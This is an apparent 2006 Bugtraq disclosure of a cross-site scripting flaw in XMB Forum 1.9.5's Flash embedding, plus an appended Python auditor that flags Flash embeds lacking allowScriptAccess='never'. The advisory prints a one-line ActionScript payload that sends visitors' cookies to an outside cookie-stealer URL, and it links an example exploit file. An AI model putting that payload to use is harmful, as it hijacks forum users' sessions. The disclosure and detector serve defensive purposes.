XMB Forum 1.9.5-Final XSS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XMB Forum 1.9.5-Final XSS
- From: r0xes.ratm@xxxxxxxxx
- Date: 9 Apr 2006 00:11:35 -0000
XMB Forum 1.9.5 (I have not tested this on earlier versions)
allows users to embed Flash (.swf) videos in their posts.
Normally, you could set an option on the <object> tag to say that ActionScript
cannot run, but in this case we don't.
The way we execute our code is by making a Flash movie containing the
ActionScript code:
getURL("javascript:document.location='http://my-site.com/path/to/cookiestealer.php?cookie='+document.cookie;");
An example video + .fla script can be downloaded at my site:
http://dynxss.whiteacid.org/videos/xmbforum_1.9.5-final.rar
XMB has been notified, expect this to be fixed in a few days.
comments, questions, flames, etc.
r0xes [dot] ratm [at] gmail [dot] com
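
Added example (not part of the original post, and not XMB code): a defender-side audit of rendered post HTML that lists Flash embeds which do not restrict script access. It assumes the option the post refers to is Flash Player's allowScriptAccess parameter, and it treats anything other than an explicit "never" as unsafe, which is an assumed policy; the class and function names and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser

# Constructed sample of rendered forum-post HTML (not taken from XMB).
SAMPLE_POST_HTML = """
<div class="post">
  <object>
    <param name="movie" value="http://example.invalid/a.swf">
  </object>
  <object>
    <param name="movie" value="http://example.invalid/b.swf">
    <param name="allowScriptAccess" value="never">
  </object>
  <embed src="http://example.invalid/c.swf" allowScriptAccess="always">
</div>
"""

class FlashEmbedAuditor(HTMLParser):
    """Records every <object>/<embed> and its allowScriptAccess setting."""
    def __init__(self):
        super().__init__()
        self.findings = []    # (tag, movie URL, allowScriptAccess or None)
        self._object = None   # state for the <object> currently open

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # attribute names arrive lowercased
        if tag == "object":
            self._object = {"src": a.get("data", ""), "asa": None}
        elif tag == "param" and self._object is not None:
            name = a.get("name", "").lower()
            if name in ("movie", "src"):
                self._object["src"] = a.get("value", "")
            elif name == "allowscriptaccess":
                self._object["asa"] = a.get("value", "").strip().lower()
        elif tag == "embed":
            asa = a.get("allowscriptaccess")   # None when the attribute is absent
            asa = asa.strip().lower() if asa is not None else None
            self.findings.append(("embed", a.get("src", ""), asa))

    def handle_endtag(self, tag):
        if tag == "object" and self._object is not None:
            self.findings.append(("object", self._object["src"], self._object["asa"]))
            self._object = None

def unsafe_flash_embeds(html):
    """Return embeds that do not explicitly set allowScriptAccess to "never"."""
    auditor = FlashEmbedAuditor()
    auditor.feed(html)
    auditor.close()
    return [f for f in auditor.findings if f[2] != "never"]
```

Run over stored or rendered posts, unsafe_flash_embeds() returns one (tag, URL, setting) tuple per embed that still needs the restriction applied in the forum's output template.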